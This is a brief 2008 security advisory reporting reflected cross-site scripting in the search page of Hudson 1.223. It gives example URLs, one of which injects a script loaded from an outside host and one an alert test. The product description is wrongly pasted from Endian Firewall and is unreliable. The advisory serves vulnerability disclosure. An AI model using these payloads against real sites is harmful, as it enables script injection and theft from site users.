Hudson version 1.223 suffers from multiple cross site scripting vulnerabilities.
d54f1e93b9088a2fca193bb1d00866b98a969de4fce6127173d5f049aa4c744d
#Security Advisory - Multiple Vulnerabilities in hudson#
Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.
Date : July-11-2008
Product : hudson
Version : 1.223 - Prior version maybe also be affected
Vendor : https://hudson.dev.java.net/
Author : syniack
Contact : syniack@gmail.com
XSS Vulnerability: [TESTED]
Security issue in the following file:
hudson/search/?q=xss
Example:
http://www.example.com/hudson/search/?q="><scriptsrc=http://www.example2.com/re.js></script>
http://www.example.com/hudson/search/?q="><script>alert(1);</script>
Image URL:
http://img81.imageshack.us/my.php?image=hudsongq2.jpg